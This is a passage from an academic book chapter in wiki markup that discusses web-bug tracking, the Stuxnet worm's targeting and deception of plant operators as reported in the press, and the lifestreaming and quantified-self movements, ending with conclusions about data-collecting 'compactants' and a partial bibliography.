As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. [Eds: Do you need to give an indication as to what some of these questions might be?] The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers [Eds: does an 'and' need to be inserted here?] carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. [Eds: again, do you need to provide some examples of these important questions?] However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways are life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also [Eds: 'also' is repeated a number of times here] useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
